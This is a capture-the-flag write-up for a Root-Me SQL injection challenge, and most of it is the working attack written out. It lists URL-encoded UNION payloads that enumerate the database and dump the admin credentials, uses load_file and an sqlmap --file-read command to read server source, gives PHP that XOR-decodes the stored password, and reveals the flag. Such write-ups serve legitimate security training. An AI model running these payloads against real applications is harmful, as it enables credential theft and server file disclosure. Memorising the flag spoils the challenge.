SQL injection - file reading

Statement
Retrieve the administrator password.

http://challenge01.root-me.org/web-serveur/ch31/

[POC]

Load URL : http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Aha ~

http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20ORDER%20BY%205--%20-+

if order by 5 = Unknown column '5' in 'order clause'

http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20ORDER%20BY%204--%20-+

if order by 4 = no result found. 

then load UNION SELECT command ^_^ 

http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20UNION%20ALL%20SELECT%201,2,3,4--%20-+

ID : 1
Username : 2
Email : 4

let's look deeper ...

http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20UNION%20ALL%20SELECT%201,version(),null,database()--%20-+

Mysql Version : 5.5.53-0ubuntu0.14.04.1
Database : c_webserveur_31

let's find the tables using group_concat(table_name) in the magic number and from information_schema.tables where table_schema=database() behind the magic number

http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20UNION%20ALL%20SELECT%20null,group_concat(table_name),null,version()%20from%20information_schema.tables%20where%20table_schema=database()--%20-+

found Tables from DB : member

let's find the columns. first convert member to hex = 0x6d656d626572 then change group_concat(table_name) to group_concat(column_name) and then put from information_schema.columns where table_name=0x6d656d626572


http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20UNION%20ALL%20SELECT%20null,group_concat(column_name),null,version()%20from%20information_schema.columns%20where%20table_name=0x6d656d626572--%20-+

found Columns from member Tables : member_id,member_login,member_password,member_email

Voila ~


http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20UNION%20ALL%20SELECT%20null,concat_ws(0x3a,member_id,member_login,member_password,member_email),null,version()%20from%20member--%20-+


1:admin:VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA==:admin@super-secure-webapp.org

lets try to read the index file

http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1%20AND%201=2%20UNION%20ALL%20SELECT%201,2,3,load_file%280x2F6368616C6C656E67652F7765622D736572766575722F636833312F696E6465782E706870%29--

or 

sqlmap -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1" —file-read=/challenge/web-serveur/ch31/index.php

found some interesting at line 9 to 16

function stringxor($o1, $o2) {
    $res = '';
    for($i=0;$i<strlen($o1);$i++)
        $res .= chr(ord($o1[$i]) ^ ord($o2[$i]));
    return $res;
}

$key = "c92fcd618967933ac463feb85ba00d5a7ae52842";

lets decode it

-------------------------------------------------------------------------------------------------------------------------------------
<?php
function stringxor($o1, $o2) {
    $res = '';
    for($i=0;$i<strlen($o1);$i++)
        $res .= chr(ord($o1[$i]) ^ ord($o2[$i]));        
    return $res;
}
echo stringxor('c92fcd618967933ac463feb85ba00d5a7ae52842',base64_decode('VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA=='));
-------------------------------------------------------------------------------------------------------------------------------------

Or
-------------------------------------------------------------------------------------------------------------------------------------
<?php
function stringxor($o1, $o2) {
$res = '';
for($i=0;$i<strlen($o1);$i++)
 $res .= chr(ord($o1[$i]) ^ ord($o2[$i]));        
return $res;
}
   
$key = "c92fcd618967933ac463feb85ba00d5a7ae52842";
echo "password is : ".stringxor($key,base64_decode('VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA=='));
?>
-------------------------------------------------------------------------------------------------------------------------------------

result = 77be4fc97f77f5f48308942bb6e32aacabed9cef (SHA-1)

77be4fc97f77f5f48308942bb6e32aacabed9cef = superpassword

#flag - superpassword

Well done, you won 40 Points
